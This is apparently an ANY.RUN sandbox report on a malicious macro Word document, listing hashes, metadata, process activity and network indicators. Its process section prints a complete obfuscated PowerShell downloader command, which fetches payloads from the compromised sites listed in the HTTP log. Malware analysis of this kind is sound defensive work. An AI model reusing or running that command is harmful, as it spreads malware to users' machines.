analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

3b7044b040ece1c0457e1a74dec5d8b1.doc

Full analysis: https://app.any.run/tasks/9368cf03-f096-4d06-a415-597c470194bd
Verdict: Malicious activity
Analysis date: June 16, 2019, 21:03:07
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: 16688Ap28750, Subject: 4379Ap89773, Author: Apaeluxaquwyn-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jun 22 12:38:00 2018, Last Saved Time/Date: Fri Jun 22 12:38:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

3B7044B040ECE1C0457E1A74DEC5D8B1

SHA1:

4DAC23F2C518AD61D57ACB28FB407A24DD7337C0

SHA256:

70F57E2A718C7EF0DF5B1B7DF0CEBF9A7AA65E67F1D6636E816780A8439FE045

SSDEEP:

1536:KjQIKgMSORC7R93PJ+aJxFht8nIg1gq/knZG+TNpvwcTd0OScGwfXHnXmz3fiPQE:KeBSOCT3PBhjThjEnn6Ttpe

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 3300)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3300)
    • Request from PowerShell which ran from Office

      • PowersHell.exe (PID: 2364)
  • SUSPICIOUS

    • Creates files in the user directory

      • PowersHell.exe (PID: 2364)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3300)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3300)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: 16688Ap28750
Subject: 4379Ap89773
Author: Apaeluxaquwyn-PC
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:06:22 11:38:00
ModifyDate: 2018:06:22 11:38:00
Pages: 1
Words: -
Characters: 1
Security: None
CodePage: Windows Latin 1 (Western European)
Company: 32377Ap52052
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 1
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Category: 65452Ap63951
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
2
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3300"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\3b7044b040ece1c0457e1a74dec5d8b1.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2364PowersHell .( $veRboSEprEFereNCe.tOsTRinG()[1,3]+'x'-jOIn'')( [stRIng]::JOin( '' , ( '37M98s66U99P109k96s33M60_33t111e100e118M44_110k99U107s100s98e117_33s115e96_111M101_110k108t58k37_87>71U116U70M96M33t60_33P111c100s118t44>110P99e107_100P98t117P33t82U120M114P117M100P108t47c79c100k117>47U86e100M99k66_109k104M100s111_117s58k37_109U106M83U113P113P113P33k60P33P38e105e117t117M113U59>46>46P98P104P109c104e111U106P96s47>111U109c46e107P103>78s100k81k121k99M83c46s65M105_117_117U113t59U46P46s98_105M104c111k96c104e108e99>104k114P114t44>99k116P100k117U117P102_100M111U47M101P100M46k108s120e48s103s116U102k118k87P46k65k105s117e117P113_59_46M46t118k118c118k47c108e96U115e115c104P96>102c100U102s96k115>101t100s111U114k47>104t111s46M101>49M105k116U99e82_117t46_65e105e117e117e113c59_46P46k118s118M118k47>117s96P109s96P117s108c110k99s104e109_120t96_47M98k110>108k46s108c98_50_120P120>81>79U46k65e105e117P117e113e59s46e46s98c105_116U115M98c105s111P100U118c110k115P109k100_96c111P114k47M110M115c102c46M103s49t79P57k111c82e113>46M38_47M82M113c109U104c117e41k38s65_38e40k58e37_115k106P113U105s113c33k60c33_37e98t66M99k109>96s47>111s100s121e117s41s48k45e33c51t51U56t55_48P53s40U58e37>105>116k96_91_72s33k60M33>37U100_111U119>59_117k100M108t113U33>42e33e38e93k38e33c42t33k37P115P106s113e105k113P33P42s33s38c47_100>121P100k38c58s103P110P115t100M96c98c105s41M37>111P105M101U99c74c81>33_104_111k33k37c109k106c83s113t113s113s40e122P117e115M120M122M37P87U71M116k70M96>47P69c110e118e111k109U110>96_101t71t104P109s100M41e37s111s105M101c99U74c81P47>85U110U82U117e115_104t111M102>41>40k45s33c37>105t116M96e91_72c40t58>82P117_96P115c117P44>81k115t110_98>100U114M114_33>37>105U116k96_91U72c58M99c115>100>96>106_58P124M98U96k117s98k105U122_118_115P104P117s100k44s105e110U114P117U33_37e94U47c68c121P98P100U113_117P104M110e111s47s76e100c114M114s96s102s100P58e124U124' -sPlIT 'C' -sPliT 'e'-SpLiT 'm'-sPLit 'u' -SPLit 's'-Split '>'-spLiT 'k' -sPLIt'_'-SpLIt 'p' -sPLIt'T' | % {[CHar]($_ -Bxor'0x01') } ) ))C:\Windows\System32\WindowsPowerShell\v1.0\PowersHell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 254
Read events
858
Write events
391
Delete events
5

Modification events

(PID) Process:(3300) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:tx>
Value:
74783E00E40C0000010000000000000000000000
(PID) Process:(3300) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(3300) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(3300) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1322254366
(PID) Process:(3300) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1322254480
(PID) Process:(3300) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1322254481
(PID) Process:(3300) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
E40C00005874EDF58624D50100000000
(PID) Process:(3300) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:gz>
Value:
677A3E00E40C000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3300) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:gz>
Value:
677A3E00E40C000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3300) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
0
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
3300WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRF8C4.tmp.cvr
MD5:
SHA256:
2364PowersHell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M1H5BFZY6OHHV1JSFTJZ.temp
MD5:
SHA256:
2364PowersHell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF120632.TMPbinary
MD5:131DC75F6D4142CA9244945A91A71E8D
SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
2364PowersHell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:131DC75F6D4142CA9244945A91A71E8D
SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
3300WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$7044b040ece1c0457e1a74dec5d8b1.docpgc
MD5:6D6FA1369F65EBB67488FB4CBAC62610
SHA256:33A53B54570A92AD1BF380FE0F447D79608354F7E0DD041B7500EAC9DAF1EE4D
3300WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:17222E7BED955763CB75EBDA153E0074
SHA256:EAEB163582F92B56C14963150DA7DBEA34565552F3D187A793BE19BEB0978882
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
6
DNS requests
8
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2364
PowersHell.exe
GET
301
192.249.119.213:80
http://churchneworleans.org/f0N8nSp/
US
suspicious
2364
PowersHell.exe
GET
301
185.94.230.235:80
http://cilinka.nl/jfOePxbR/
NL
suspicious
2364
PowersHell.exe
GET
404
196.196.5.147:80
http://www.talatmobilya.com/mc3yyPN/
SC
html
25.6 Kb
suspicious
2364
PowersHell.exe
GET
404
185.94.230.235:80
http://www.cilinka.nl/jfOePxbR/
NL
html
13.5 Kb
suspicious
2364
PowersHell.exe
GET
404
31.47.243.162:80
http://chinaimbiss-buettgen.de/my1fugwV/
DE
html
15.3 Kb
suspicious
2364
PowersHell.exe
GET
404
192.249.119.213:80
http://www.churchneworleans.org/f0N8nSp/
US
html
19.9 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2364
PowersHell.exe
196.196.5.147:80
www.talatmobilya.com
Inter Connects Inc
SC
suspicious
2364
PowersHell.exe
31.47.243.162:80
chinaimbiss-buettgen.de
dogado GmbH
DE
suspicious
2364
PowersHell.exe
192.249.119.213:80
churchneworleans.org
InMotion Hosting, Inc.
US
suspicious
2364
PowersHell.exe
185.94.230.235:80
cilinka.nl
NL
suspicious

DNS requests

Domain
IP
Reputation
cilinka.nl
  • 185.94.230.235
suspicious
www.cilinka.nl
  • 185.94.230.235
suspicious
chinaimbiss-buettgen.de
  • 31.47.243.162
suspicious
www.marriagegardens.in
suspicious
www.talatmobilya.com
  • 196.196.5.147
suspicious
churchneworleans.org
  • 192.249.119.213
suspicious
www.churchneworleans.org
  • 192.249.119.213
malicious

Threats

No threats detected
No debug info